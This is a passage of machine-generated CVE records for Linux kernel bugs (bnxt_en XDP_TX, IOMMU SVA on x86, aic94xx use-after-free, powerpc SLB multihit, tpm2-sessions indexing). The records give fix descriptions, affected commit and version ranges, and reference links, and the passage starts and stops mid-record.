pending XDP_TX packets.\n\nThe fix is to only clear BNXT_RX_EVENT when we have successfully\ncalled __bnxt_xmit_xdp()."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:28:48.604Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/4b83902a1e67ff327ab5c6c65021a03e72c081d6"
},
{
"url": "https://git.kernel.org/stable/c/f17e0c1208485b24d61271bc1ddc8f2087e71561"
},
{
"url": "https://git.kernel.org/stable/c/0373d5c387f24de749cc22e694a14b3a7c7eb515"
}
],
"title": "bnxt_en: Fix XDP_TX path",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68770",
"datePublished": "2026-01-13T15:28:48.604Z",
"dateReserved": "2025-12-24T10:30:51.035Z",
"dateUpdated": "2026-01-13T15:28:48.604Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71089 (GCVE-0-2025-71089)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-13 15:34
Title
iommu: disable SVA when CONFIG_X86 is set
Summary
In the Linux kernel, the following vulnerability has been resolved:
iommu: disable SVA when CONFIG_X86 is set
Patch series "Fix stale IOTLB entries for kernel address space", v7.
This proposes a fix for a security vulnerability related to IOMMU Shared
Virtual Addressing (SVA). In an SVA context, an IOMMU can cache kernel
page table entries. When a kernel page table page is freed and
reallocated for another purpose, the IOMMU might still hold stale,
incorrect entries. This can be exploited to cause a use-after-free or
write-after-free condition, potentially leading to privilege escalation or
data corruption.
This solution introduces a deferred freeing mechanism for kernel page
table pages, which provides a safe window to notify the IOMMU to
invalidate its caches before the page is reused.
This patch (of 8):
In the IOMMU Shared Virtual Addressing (SVA) context, the IOMMU hardware
shares and walks the CPU's page tables. The x86 architecture maps the
kernel's virtual address space into the upper portion of every process's
page table. Consequently, in an SVA context, the IOMMU hardware can walk
and cache kernel page table entries.
The Linux kernel currently lacks a notification mechanism for kernel page
table changes, specifically when page table pages are freed and reused.
The IOMMU driver is only notified of changes to user virtual address
mappings. This can cause the IOMMU's internal caches to retain stale
entries for kernel VA.
Use-After-Free (UAF) and Write-After-Free (WAF) conditions arise when
kernel page table pages are freed and later reallocated. The IOMMU could
misinterpret the new data as valid page table entries. The IOMMU might
then walk into attacker-controlled memory, leading to arbitrary physical
memory DMA access or privilege escalation. This is also a
Write-After-Free issue, as the IOMMU will potentially continue to write
Accessed and Dirty bits to the freed memory while attempting to walk the
stale page tables.
Currently, SVA contexts are unprivileged and cannot access kernel
mappings. However, the IOMMU will still walk kernel-only page tables all
the way down to the leaf entries, where it realizes the mapping is for the
kernel and errors out. This means the IOMMU still caches these
intermediate page table entries, making the described vulnerability a real
concern.
Disable SVA on x86 architecture until the IOMMU can receive notification
to flush the paging cache before freeing the CPU kernel page table pages.
Severity
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 26b25a2b98e45aeb40eedcedc586ad5034cbd984 , < 240cd7f2812cc25496b12063d11c823618f364e9 (git) |
| Linux | Linux | Affected: 26b25a2b98e45aeb40eedcedc586ad5034cbd984 , < c2c3f1a3fd74ef16cf115f0c558616a13a8471b4 (git) |
| Linux | Linux | Affected: 26b25a2b98e45aeb40eedcedc586ad5034cbd984 , < c341dee80b5df49a936182341b36395c831c2661 (git) |
| Linux | Linux | Affected: 26b25a2b98e45aeb40eedcedc586ad5034cbd984 , < 72f98ef9a4be30d2a60136dd6faee376f780d06c (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/iommu/iommu-sva.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "240cd7f2812cc25496b12063d11c823618f364e9",
"status": "affected",
"version": "26b25a2b98e45aeb40eedcedc586ad5034cbd984",
"versionType": "git"
},
{
"lessThan": "c2c3f1a3fd74ef16cf115f0c558616a13a8471b4",
"status": "affected",
"version": "26b25a2b98e45aeb40eedcedc586ad5034cbd984",
"versionType": "git"
},
{
"lessThan": "c341dee80b5df49a936182341b36395c831c2661",
"status": "affected",
"version": "26b25a2b98e45aeb40eedcedc586ad5034cbd984",
"versionType": "git"
},
{
"lessThan": "72f98ef9a4be30d2a60136dd6faee376f780d06c",
"status": "affected",
"version": "26b25a2b98e45aeb40eedcedc586ad5034cbd984",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/iommu/iommu-sva.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.2"
},
{
"lessThan": "5.2",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "5.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "5.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\niommu: disable SVA when CONFIG_X86 is set\n\nPatch series \"Fix stale IOTLB entries for kernel address space\", v7.\n\nThis proposes a fix for a security vulnerability related to IOMMU Shared\nVirtual Addressing (SVA). In an SVA context, an IOMMU can cache kernel\npage table entries. When a kernel page table page is freed and\nreallocated for another purpose, the IOMMU might still hold stale,\nincorrect entries. This can be exploited to cause a use-after-free or\nwrite-after-free condition, potentially leading to privilege escalation or\ndata corruption.\n\nThis solution introduces a deferred freeing mechanism for kernel page\ntable pages, which provides a safe window to notify the IOMMU to\ninvalidate its caches before the page is reused.\n\n\nThis patch (of 8):\n\nIn the IOMMU Shared Virtual Addressing (SVA) context, the IOMMU hardware\nshares and walks the CPU\u0027s page tables. The x86 architecture maps the\nkernel\u0027s virtual address space into the upper portion of every process\u0027s\npage table. Consequently, in an SVA context, the IOMMU hardware can walk\nand cache kernel page table entries.\n\nThe Linux kernel currently lacks a notification mechanism for kernel page\ntable changes, specifically when page table pages are freed and reused. \nThe IOMMU driver is only notified of changes to user virtual address\nmappings. This can cause the IOMMU\u0027s internal caches to retain stale\nentries for kernel VA.\n\nUse-After-Free (UAF) and Write-After-Free (WAF) conditions arise when\nkernel page table pages are freed and later reallocated. The IOMMU could\nmisinterpret the new data as valid page table entries. The IOMMU might\nthen walk into attacker-controlled memory, leading to arbitrary physical\nmemory DMA access or privilege escalation. 
This is also a\nWrite-After-Free issue, as the IOMMU will potentially continue to write\nAccessed and Dirty bits to the freed memory while attempting to walk the\nstale page tables.\n\nCurrently, SVA contexts are unprivileged and cannot access kernel\nmappings. However, the IOMMU will still walk kernel-only page tables all\nthe way down to the leaf entries, where it realizes the mapping is for the\nkernel and errors out. This means the IOMMU still caches these\nintermediate page table entries, making the described vulnerability a real\nconcern.\n\nDisable SVA on x86 architecture until the IOMMU can receive notification\nto flush the paging cache before freeing the CPU kernel page table pages."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:34:51.079Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/240cd7f2812cc25496b12063d11c823618f364e9"
},
{
"url": "https://git.kernel.org/stable/c/c2c3f1a3fd74ef16cf115f0c558616a13a8471b4"
},
{
"url": "https://git.kernel.org/stable/c/c341dee80b5df49a936182341b36395c831c2661"
},
{
"url": "https://git.kernel.org/stable/c/72f98ef9a4be30d2a60136dd6faee376f780d06c"
}
],
"title": "iommu: disable SVA when CONFIG_X86 is set",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71089",
"datePublished": "2026-01-13T15:34:51.079Z",
"dateReserved": "2026-01-13T15:30:19.649Z",
"dateUpdated": "2026-01-13T15:34:51.079Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71075 (GCVE-0-2025-71075)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:31 – Updated: 2026-01-19 12:19
Title
scsi: aic94xx: fix use-after-free in device removal path
Summary
In the Linux kernel, the following vulnerability has been resolved:
scsi: aic94xx: fix use-after-free in device removal path
The asd_pci_remove() function fails to synchronize with pending tasklets
before freeing the asd_ha structure, leading to a potential
use-after-free vulnerability.
When a device removal is triggered (via hot-unplug or module unload),
race condition can occur.
The fix adds tasklet_kill() before freeing the asd_ha structure,
ensuring all scheduled tasklets complete before cleanup proceeds.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 2908d778ab3e244900c310974e1fc1c69066e450, < c8f6f88cd1df35155258285c4f43268b361819df (git) |
| Linux | Linux | Affected: 2908d778ab3e244900c310974e1fc1c69066e450, < 278455a82245a572aeb218a6212a416a98e418de (git) |
| Linux | Linux | Affected: 2908d778ab3e244900c310974e1fc1c69066e450, < b3e655e52b98a1d3df41c8e42035711e083099f8 (git) |
| Linux | Linux | Affected: 2908d778ab3e244900c310974e1fc1c69066e450, < e354793a7ab9bb0934ea699a9d57bcd1b48fc27b (git) |
| Linux | Linux | Affected: 2908d778ab3e244900c310974e1fc1c69066e450, < a41dc180b6e1229ae49ca290ae14d82101c148c3 (git) |
| Linux | Linux | Affected: 2908d778ab3e244900c310974e1fc1c69066e450, < 751c19635c2bfaaf2836a533caa3663633066dcf (git) |
| Linux | Linux | Affected: 2908d778ab3e244900c310974e1fc1c69066e450, < f6ab594672d4cba08540919a4e6be2e202b60007 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/scsi/aic94xx/aic94xx_init.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c8f6f88cd1df35155258285c4f43268b361819df",
"status": "affected",
"version": "2908d778ab3e244900c310974e1fc1c69066e450",
"versionType": "git"
},
{
"lessThan": "278455a82245a572aeb218a6212a416a98e418de",
"status": "affected",
"version": "2908d778ab3e244900c310974e1fc1c69066e450",
"versionType": "git"
},
{
"lessThan": "b3e655e52b98a1d3df41c8e42035711e083099f8",
"status": "affected",
"version": "2908d778ab3e244900c310974e1fc1c69066e450",
"versionType": "git"
},
{
"lessThan": "e354793a7ab9bb0934ea699a9d57bcd1b48fc27b",
"status": "affected",
"version": "2908d778ab3e244900c310974e1fc1c69066e450",
"versionType": "git"
},
{
"lessThan": "a41dc180b6e1229ae49ca290ae14d82101c148c3",
"status": "affected",
"version": "2908d778ab3e244900c310974e1fc1c69066e450",
"versionType": "git"
},
{
"lessThan": "751c19635c2bfaaf2836a533caa3663633066dcf",
"status": "affected",
"version": "2908d778ab3e244900c310974e1fc1c69066e450",
"versionType": "git"
},
{
"lessThan": "f6ab594672d4cba08540919a4e6be2e202b60007",
"status": "affected",
"version": "2908d778ab3e244900c310974e1fc1c69066e450",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/scsi/aic94xx/aic94xx_init.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.19"
},
{
"lessThan": "2.6.19",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "2.6.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "2.6.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "2.6.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "2.6.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "2.6.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "2.6.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "2.6.19",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: aic94xx: fix use-after-free in device removal path\n\nThe asd_pci_remove() function fails to synchronize with pending tasklets\nbefore freeing the asd_ha structure, leading to a potential\nuse-after-free vulnerability.\n\nWhen a device removal is triggered (via hot-unplug or module unload),\nrace condition can occur.\n\nThe fix adds tasklet_kill() before freeing the asd_ha structure,\nensuring all scheduled tasklets complete before cleanup proceeds."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:32.116Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c8f6f88cd1df35155258285c4f43268b361819df"
},
{
"url": "https://git.kernel.org/stable/c/278455a82245a572aeb218a6212a416a98e418de"
},
{
"url": "https://git.kernel.org/stable/c/b3e655e52b98a1d3df41c8e42035711e083099f8"
},
{
"url": "https://git.kernel.org/stable/c/e354793a7ab9bb0934ea699a9d57bcd1b48fc27b"
},
{
"url": "https://git.kernel.org/stable/c/a41dc180b6e1229ae49ca290ae14d82101c148c3"
},
{
"url": "https://git.kernel.org/stable/c/751c19635c2bfaaf2836a533caa3663633066dcf"
},
{
"url": "https://git.kernel.org/stable/c/f6ab594672d4cba08540919a4e6be2e202b60007"
}
],
"title": "scsi: aic94xx: fix use-after-free in device removal path",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71075",
"datePublished": "2026-01-13T15:31:28.075Z",
"dateReserved": "2026-01-13T15:30:19.647Z",
"dateUpdated": "2026-01-19T12:19:32.116Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71078 (GCVE-0-2025-71078)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-19 12:19
Title
powerpc/64s/slb: Fix SLB multihit issue during SLB preload
Summary
In the Linux kernel, the following vulnerability has been resolved:
powerpc/64s/slb: Fix SLB multihit issue during SLB preload
On systems using the hash MMU, there is a software SLB preload cache that
mirrors the entries loaded into the hardware SLB buffer. This preload
cache is subject to periodic eviction — typically after every 256 context
switches — to remove old entry.
To optimize performance, the kernel skips switch_mmu_context() in
switch_mm_irqs_off() when the prev and next mm_struct are the same.
However, on hash MMU systems, this can lead to inconsistencies between
the hardware SLB and the software preload cache.
If an SLB entry for a process is evicted from the software cache on one
CPU, and the same process later runs on another CPU without executing
switch_mmu_context(), the hardware SLB may retain stale entries. If the
kernel then attempts to reload that entry, it can trigger an SLB
multi-hit error.
The following timeline shows how stale SLB entries are created and can
cause a multi-hit error when a process moves between CPUs without a
MMU context switch.
```
CPU 0                                   CPU 1
-----                                   -----
Process P
exec                                    swapper/1
 load_elf_binary
  begin_new_exc
   activate_mm
    switch_mm_irqs_off
     switch_mmu_context
      switch_slb
      /*
       * This invalidates all
       * the entries in the HW
       * and setup the new HW
       * SLB entries as per the
       * preload cache.
       */
context_switch
sched_migrate_task migrates process P to cpu-1

Process swapper/0                       context switch (to process P)
(uses mm_struct of Process P)           switch_mm_irqs_off()
                                         switch_slb
                                          load_slb++
                                          /*
                                           * load_slb becomes 0 here
                                           * and we evict an entry from
                                           * the preload cache with
                                           * preload_age(). We still
                                           * keep HW SLB and preload
                                           * cache in sync, that is
                                           * because all HW SLB entries
                                           * anyways gets evicted in
                                           * switch_slb during SLBIA.
                                           * We then only add those
                                           * entries back in HW SLB,
                                           * which are currently
                                           * present in preload_cache
                                           * (after eviction).
                                           */
                                        load_elf_binary continues...
                                         setup_new_exec()
                                          slb_setup_new_exec()

                                        sched_switch event
                                        sched_migrate_task migrates
                                        process P to cpu-0

context_switch from swapper/0 to Process P
 switch_mm_irqs_off()
 /*
  * Since both prev and next mm struct are same we don't call
  * switch_mmu_context(). This will cause the HW SLB and SW preload
  * cache to go out of sync in preload_new_slb_context. Because there
  * was an SLB entry which was evicted from both HW and preload cache
  * on cpu-1. Now later in preload_new_slb_context(), when we will try
  * to add the same preload entry again, we will add this to the SW
  * preload cache and then will add it to the HW SLB. Since on cpu-0
  * this entry was never invalidated, hence adding this entry to the HW
  * SLB will cause a SLB multi-hit error.
  */
load_elf_binary cont
```
---truncated---
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 5434ae74629af58ad0fc27143a9ea435f7734410, < 01324c0328181b94cf390bda22ff91c75126ea57 (git) |
| Linux | Linux | Affected: 5434ae74629af58ad0fc27143a9ea435f7734410, < 2e9a95d60f1df7b57618fd5ef057aef331575bd2 (git) |
| Linux | Linux | Affected: 5434ae74629af58ad0fc27143a9ea435f7734410, < c9f865022a1823d814032a09906e91e4701a35fc (git) |
| Linux | Linux | Affected: 5434ae74629af58ad0fc27143a9ea435f7734410, < b13a3dbfa196af68eae2031f209743735ad416bf (git) |
| Linux | Linux | Affected: 5434ae74629af58ad0fc27143a9ea435f7734410, < 895123c309a34d2cfccf7812b41e17261a3a6f37 (git) |
| Linux | Linux | Affected: 5434ae74629af58ad0fc27143a9ea435f7734410, < 4ae1e46d8a290319f33f71a2710a1382ba5431e8 (git) |
| Linux | Linux | Affected: 5434ae74629af58ad0fc27143a9ea435f7734410, < 00312419f0863964625d6dcda8183f96849412c6 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"arch/powerpc/include/asm/book3s/64/mmu-hash.h",
"arch/powerpc/kernel/process.c",
"arch/powerpc/mm/book3s64/internal.h",
"arch/powerpc/mm/book3s64/mmu_context.c",
"arch/powerpc/mm/book3s64/slb.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "01324c0328181b94cf390bda22ff91c75126ea57",
"status": "affected",
"version": "5434ae74629af58ad0fc27143a9ea435f7734410",
"versionType": "git"
},
{
"lessThan": "2e9a95d60f1df7b57618fd5ef057aef331575bd2",
"status": "affected",
"version": "5434ae74629af58ad0fc27143a9ea435f7734410",
"versionType": "git"
},
{
"lessThan": "c9f865022a1823d814032a09906e91e4701a35fc",
"status": "affected",
"version": "5434ae74629af58ad0fc27143a9ea435f7734410",
"versionType": "git"
},
{
"lessThan": "b13a3dbfa196af68eae2031f209743735ad416bf",
"status": "affected",
"version": "5434ae74629af58ad0fc27143a9ea435f7734410",
"versionType": "git"
},
{
"lessThan": "895123c309a34d2cfccf7812b41e17261a3a6f37",
"status": "affected",
"version": "5434ae74629af58ad0fc27143a9ea435f7734410",
"versionType": "git"
},
{
"lessThan": "4ae1e46d8a290319f33f71a2710a1382ba5431e8",
"status": "affected",
"version": "5434ae74629af58ad0fc27143a9ea435f7734410",
"versionType": "git"
},
{
"lessThan": "00312419f0863964625d6dcda8183f96849412c6",
"status": "affected",
"version": "5434ae74629af58ad0fc27143a9ea435f7734410",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"arch/powerpc/include/asm/book3s/64/mmu-hash.h",
"arch/powerpc/kernel/process.c",
"arch/powerpc/mm/book3s64/internal.h",
"arch/powerpc/mm/book3s64/mmu_context.c",
"arch/powerpc/mm/book3s64/slb.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.20"
},
{
"lessThan": "4.20",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "4.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/64s/slb: Fix SLB multihit issue during SLB preload\n\nOn systems using the hash MMU, there is a software SLB preload cache that\nmirrors the entries loaded into the hardware SLB buffer. This preload\ncache is subject to periodic eviction \u2014 typically after every 256 context\nswitches \u2014 to remove old entry.\n\nTo optimize performance, the kernel skips switch_mmu_context() in\nswitch_mm_irqs_off() when the prev and next mm_struct are the same.\nHowever, on hash MMU systems, this can lead to inconsistencies between\nthe hardware SLB and the software preload cache.\n\nIf an SLB entry for a process is evicted from the software cache on one\nCPU, and the same process later runs on another CPU without executing\nswitch_mmu_context(), the hardware SLB may retain stale entries. If the\nkernel then attempts to reload that entry, it can trigger an SLB\nmulti-hit error.\n\nThe following timeline shows how stale SLB entries are created and can\ncause a multi-hit error when a process moves between CPUs without a\nMMU context switch.\n\nCPU 0 CPU 1\n----- -----\nProcess P\nexec swapper/1\n load_elf_binary\n begin_new_exc\n activate_mm\n switch_mm_irqs_off\n switch_mmu_context\n switch_slb\n /*\n * This invalidates all\n * the entries in the HW\n * and setup the new HW\n * SLB entries as per the\n * preload cache.\n */\ncontext_switch\nsched_migrate_task migrates process P to cpu-1\n\nProcess swapper/0 context switch (to process P)\n(uses mm_struct of Process P) switch_mm_irqs_off()\n switch_slb\n load_slb++\n /*\n * load_slb becomes 0 here\n * and we evict an entry from\n * the preload cache with\n * preload_age(). 
We still\n * keep HW SLB and preload\n * cache in sync, that is\n * because all HW SLB entries\n * anyways gets evicted in\n * switch_slb during SLBIA.\n * We then only add those\n * entries back in HW SLB,\n * which are currently\n * present in preload_cache\n * (after eviction).\n */\n load_elf_binary continues...\n setup_new_exec()\n slb_setup_new_exec()\n\n sched_switch event\n sched_migrate_task migrates\n process P to cpu-0\n\ncontext_switch from swapper/0 to Process P\n switch_mm_irqs_off()\n /*\n * Since both prev and next mm struct are same we don\u0027t call\n * switch_mmu_context(). This will cause the HW SLB and SW preload\n * cache to go out of sync in preload_new_slb_context. Because there\n * was an SLB entry which was evicted from both HW and preload cache\n * on cpu-1. Now later in preload_new_slb_context(), when we will try\n * to add the same preload entry again, we will add this to the SW\n * preload cache and then will add it to the HW SLB. Since on cpu-0\n * this entry was never invalidated, hence adding this entry to the HW\n * SLB will cause a SLB multi-hit error.\n */\nload_elf_binary cont\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:39.722Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/01324c0328181b94cf390bda22ff91c75126ea57"
},
{
"url": "https://git.kernel.org/stable/c/2e9a95d60f1df7b57618fd5ef057aef331575bd2"
},
{
"url": "https://git.kernel.org/stable/c/c9f865022a1823d814032a09906e91e4701a35fc"
},
{
"url": "https://git.kernel.org/stable/c/b13a3dbfa196af68eae2031f209743735ad416bf"
},
{
"url": "https://git.kernel.org/stable/c/895123c309a34d2cfccf7812b41e17261a3a6f37"
},
{
"url": "https://git.kernel.org/stable/c/4ae1e46d8a290319f33f71a2710a1382ba5431e8"
},
{
"url": "https://git.kernel.org/stable/c/00312419f0863964625d6dcda8183f96849412c6"
}
],
"title": "powerpc/64s/slb: Fix SLB multihit issue during SLB preload",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71078",
"datePublished": "2026-01-13T15:34:43.437Z",
"dateReserved": "2026-01-13T15:30:19.648Z",
"dateUpdated": "2026-01-19T12:19:39.722Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68792 (GCVE-0-2025-68792)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-17 15:37
Title
tpm2-sessions: Fix out of range indexing in name_size
Summary
In the Linux kernel, the following vulnerability has been resolved:
tpm2-sessions: Fix out of range indexing in name_size
'name_size' does not have any range checks, and it just directly indexes
with TPM_ALG_ID, which could lead into memory corruption at worst.
Address the issue by only processing known values and returning -EINVAL for
unrecognized values.
Make also 'tpm_buf_append_name' and 'tpm_buf_fill_hmac_session' fallible so
that errors are detected before causing any spurious TPM traffic.
End also the authorization session on failure in both of the functions, as
the session state would be then by definition corrupted.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 1085b8276bb4239daa7008f0dcd5c973e4bd690f, < 47e676ce4d68f461dfcab906f6aeb254f7276deb (git) |
| Linux | Linux | Affected: 1085b8276bb4239daa7008f0dcd5c973e4bd690f, < 04a3aa6e8c5f878cc51a8a1c90b6d3c54079bc43 (git) |
| Linux | Linux | Affected: 1085b8276bb4239daa7008f0dcd5c973e4bd690f, < 6e9722e9a7bfe1bbad649937c811076acf86e1fd (git) |
{
"containers": {
